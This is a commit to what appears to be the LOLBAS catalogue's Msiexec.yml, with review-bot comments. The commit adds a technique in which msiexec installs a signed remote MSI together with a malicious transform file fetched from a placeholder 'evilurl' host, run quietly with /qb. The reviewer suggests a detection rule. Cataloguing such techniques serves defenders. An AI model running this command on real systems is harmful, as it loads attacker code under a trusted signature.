Update Msiexec.yml (#333)

* Update Msiexec.yml

Added transform file execution

* Update Msiexec.yml
pfiatde 2023-11-06 13:47:04 +01:00 committed by GitHub
parent 760151b598
commit ee78111254
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23


@ -32,6 +32,13 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.007 MitreID: T1218.007
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: msiexec /i "https://trustedURL/signed.msi" TRANSFORMS="https://evilurl/evil.mst" /qb
Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a Transformfile will be used, which can contains malicious code or binaries. The /qb will skip user input.
Usecase: Install trusted and signed msi file, with additional attack code as Treansorm file, from remote server
Category: Execute
Privileges: User
MitreID: T1218.007
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path: Full_Path:
- Path: C:\Windows\System32\msiexec.exe - Path: C:\Windows\System32\msiexec.exe
- Path: C:\Windows\SysWOW64\msiexec.exe - Path: C:\Windows\SysWOW64\msiexec.exe
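Review bot: The Description and Usecase lines of the new Command entry contain typos that will be published in the rendered entry: "can contains", "Transformfile", "Additional to the file" and "Treansorm file". Suggested wording: `Description: Installs the target .MSI file from a remote URL; the file can be signed by the vendor. In addition, a transform file (.mst) is applied, which can contain malicious code or binaries. /qb skips user input.` and `Usecase: Install a trusted, signed MSI file with additional attack code supplied as a transform file from a remote server`. It would also help to state outright that the vendor signature is on the .msi and the transform is a separate file, since that is the point of the entry. The two placeholder hosts are cased differently (`trustedURL` and `evilurl`); pick one style.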
@ -46,6 +53,7 @@ Detection:
Resources: Resources:
- Link: https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/ - Link: https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/
- Link: https://twitter.com/PhilipTsukerman/status/992021361106268161 - Link: https://twitter.com/PhilipTsukerman/status/992021361106268161
- Link: https://badoption.eu/blog/2023/10/03/MSIFortune.html
Acknowledgement: Acknowledgement:
- Person: netbiosX - Person: netbiosX
Handle: '@netbiosX' Handle: '@netbiosX'
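Review bot: Missing detection coverage for the new command: this hunk sits under `Detection:` but the only added line is the `badoption.eu` link in Resources, so the entry ships a new technique with nothing for defenders to match on. Consider adding a Detection item keyed on what is distinctive in the new command line, namely an `msiexec` invocation that carries a `TRANSFORMS=` property whose value is an `http://` or `https://` URL, so that process-creation logging can flag it separately from ordinary remote `/i` installs.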